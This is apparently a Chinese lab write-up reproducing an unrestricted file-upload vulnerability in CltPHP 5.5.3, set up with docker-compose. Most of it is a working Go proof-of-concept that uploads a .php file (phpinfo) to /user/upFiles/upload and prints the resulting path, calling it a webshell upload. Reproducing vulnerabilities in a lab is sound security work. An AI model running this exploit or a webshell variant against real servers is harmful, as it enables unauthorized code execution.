Cltphp 5.5.3漏洞复现
环境搭建
使用docker-compose搭建
docker-compose build
docker-compose up -d
漏洞环境地址
https://github.com/0xs1riu5/vulawdhub
漏洞复现
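这里写了一个简单的验证脚本：向 /user/upFiles/upload 接口以 multipart 表单上传一个内容仅为 phpinfo() 的 1.php，并打印服务端在 JSON 响应中返回的文件路径，用来确认该接口是否未校验上传文件的扩展名。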
package main
import (
	"bytes"
	"encoding/json"
	"fmt"
	"io"
	"mime/multipart"
	"net/http"
	"time"
)
// Fixed parameters of the upload check.
const (
	// uploadURL is the format string for the upload endpoint; %s is replaced
	// with the base URL of the instance under test.
	uploadURL = "%s/user/upFiles/upload"

	// filePath is the filename sent in the multipart part. The .php extension
	// is the point of the check: a server that validates upload extensions
	// should refuse it.
	filePath = "1.php"

	// fileData is the content of the probe file: a single phpinfo() call.
	fileData = "<?php phpinfo(); ?>"
)
// UploadResponse is the part of the upload endpoint's JSON reply that this
// program reads. Any other fields in the reply are ignored by the decoder.
type UploadResponse struct {
	// URL is the path the server reports for the stored file ("url" in JSON).
	URL string `json:"url"`
}
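// clphpUpload checks whether the instance at url accepts a .php file on its
// /user/upFiles/upload endpoint.
//
// It posts fileData as a multipart form part named "file" with the filename
// filePath. On HTTP 200 it decodes the JSON reply and prints the path the
// server reports for the stored file. Every outcome is reported on stdout;
// nothing is returned.
//
// A 200 reply that carries a file URL means the server stored the .php file.
// Whether that file is then executed depends on how the web server treats the
// upload directory, so the printed path still has to be requested to confirm.
func clphpUpload(url string) {
	// Use a distinct name instead of shadowing the uploadURL constant.
	target := fmt.Sprintf(uploadURL, url)

	// Build the multipart body in memory.
	body := &bytes.Buffer{}
	writer := multipart.NewWriter(body)
	part, err := writer.CreateFormFile("file", filePath)
	if err != nil {
		fmt.Printf("Error creating form file: %v\n", err)
		return
	}
	if _, err = io.WriteString(part, fileData); err != nil {
		fmt.Printf("Error copying file data: %v\n", err)
		return
	}
	// Close writes the terminating boundary; it must happen before sending.
	if err = writer.Close(); err != nil {
		fmt.Printf("Error closing writer: %v\n", err)
		return
	}

	req, err := http.NewRequest(http.MethodPost, target, body)
	if err != nil {
		fmt.Printf("Error creating HTTP request: %v\n", err)
		return
	}
	req.Header.Set("User-Agent", "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)")
	req.Header.Set("X-Requested-With", "XMLHttpRequest")
	req.Header.Set("Content-Type", writer.FormDataContentType())

	// A zero-value http.Client has no timeout and can hang forever on an
	// unresponsive host.
	client := &http.Client{Timeout: 15 * time.Second}
	response, err := client.Do(req)
	if err != nil {
		fmt.Printf("Error making HTTP request: %v\n", err)
		return
	}
	defer response.Body.Close()

	if response.StatusCode != http.StatusOK {
		fmt.Printf("Failed to upload file. Status code: %d\n", response.StatusCode)
		return
	}

	// Cap how much of the reply is parsed; the expected JSON is small.
	var uploadResponse UploadResponse
	if err := json.NewDecoder(io.LimitReader(response.Body, 1<<20)).Decode(&uploadResponse); err != nil {
		fmt.Printf("Error decoding JSON response: %v\n", err)
		return
	}

	// A 200 reply without a file URL (for example a JSON error object from a
	// server that rejected the file) must not be reported as a success.
	if uploadResponse.URL == "" {
		fmt.Printf("Upload was not accepted: response contains no file URL\n")
		return
	}

	fmt.Printf("webshell 上传成功!\n")
	fmt.Printf("访问路径为: %s/public%s\n", url, uploadResponse.URL)
}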
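// main prompts on stdin for the base URL of the instance to check and runs
// clphpUpload against it.
func main() {
	fmt.Print("Enter the URL: ")
	var url string
	// Stop on unreadable or empty input instead of sending a request to a
	// malformed address.
	if _, err := fmt.Scanln(&url); err != nil {
		fmt.Printf("Error reading URL: %v\n", err)
		return
	}
	clphpUpload(url)
}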